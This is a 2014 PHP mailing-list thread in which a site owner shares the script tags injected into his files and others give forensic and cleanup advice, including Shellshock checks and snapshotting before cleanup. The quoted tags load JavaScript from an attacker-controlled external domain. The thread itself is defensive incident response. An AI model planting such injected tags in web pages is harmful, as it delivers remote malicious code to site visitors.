------------ Original Message ------------ > Date: Tuesday, October 07, 2014 20:36:00 -0400 > From: Jim Giner <jim.giner@xxxxxxxxxxxxxxxxxx> > To: php-general@xxxxxxxxxxxxx > Subject: Re: Re: hacked!! > > On 10/7/2014 6:10 PM, Kevin Kinsey wrote: >> On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote: >>> If anyone is interested here is what is being inserted into >>> random html and php files: >>> >>> <!--f853a8--><script type="text/javascript" >>> src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138";></scri >>> pt><!--/f853a8--> >>> >>> and >>> >>> <!--83b914--><script type="text/javascript" >>> src="http://n/mytdhzzp.php?id=9625233";></script><!--/83b914--> >>> >> >> Hi Jim, >> >> Thanks for being open and sharing this information. I'm sorry I'm >> late to the party. >> >> IANAE on security, but I have some experience with forensics and >> server administration as well as identifying attack vectors in >> PHP and ColdFusion and mitigating them. >> >> Off the top of my head, this *looks* a tad like code injection >> via an unknown vector. By chance, are these code snippets >> attached to the *end* of the files that contain them? >> >> Keep copies of the infected files, with accurate timestamps for >> the date of last modification. >> >> If you can obtain server access logs, it would be prudent to >> search them (with a "find" tool, like Unix 'grep' or the search >> features of your favorite editor, for the strings in the HTML >> comment sections, portions of the suspect URLs, etc. >> >> Your web host will perhaps listen well if you pay them well, and >> the less you pay them, the less likely they are to be concerned. >> However, I would open a ticket and advise them of what has >> occurred. Ask them some questions, like what kind of security >> software is installed on their shared server, whether or not they >> monitor network traffic for suspect packets, *whether or not the >> server is vulnerable to "bash shell shock" (CVE-2014-6271 and >> CVE-2014-7169) (also known as "bashdoor")*. >> >> If your website has *no* third-party software built in, that's >> good news, up to a point. It may indeed be that your code is >> "tough enough" and the hole was not in your code. Given the >> severity of ShellShock and the fact that your server contains >> other peoples' sites as well, which may have 3rd party packages >> that are vulnerable, I might think rather seriously about using a >> VM, as others have suggested, in the future if at all feasible. >> >> Hope this helps, >> >> Kevin Kinsey >> > I'm afraid I can't keep the info you mentioned since I already > cleaned this up. Yes - some of the problem was with large chunks > of code at the bottom of a couple of index.php files. Most of it > was a small commented out piece of <script> code that called some > site in Germany. I have a utility to scan every file in my domain > that helped me find all the occurrences (about 30) which I then > updated after cleaning them. > > Thanks for the tips tho. When dealing with a hacked site it is always best to snapshot the whole site - not limiting to the documentroot -- making certain to preserve everything including file dates/times, permissions, ownerships, etc., and capturing any hidden directories or files (a common method for leaving backdoors) - before cleaning anything up. That way there is something that can be reviewed at a later stage. If you haven't been able to pinpoint the source of the intrusion, I would suggest using your utility to scan your site on a very regular basis. - Richard -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
